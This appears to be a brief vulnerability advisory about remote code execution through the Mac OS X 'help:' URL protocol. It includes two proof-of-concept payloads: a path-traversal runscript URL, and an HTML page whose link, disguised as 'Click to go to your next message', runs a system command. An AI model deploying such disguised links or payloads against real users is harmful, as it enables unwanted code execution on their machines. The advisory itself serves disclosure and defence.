|
Apple Mac OS X Help Protocol Remote Code Execution Vulnerability
The following proof of concept has been provided: help:runscript=../../Scripts/Info Scripts/Current Date & Time.scpt The following proof of concept is available as well: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> ? ? <meta content="text/html;charset=ISO-8859-1" http-equiv="Content-Type"> ? ? <title></title> </head> <body bgcolor="#ffffff" text="#000000"> <a ? href="help:runscript=MacHelp.help/Contents/Resourc es/English.lproj/shrd/OpnApp.scpt%20string=%27usr: bin:du%27">Click to go to your next message</a><br> </body> </html> |
|
 Privacy Statement |
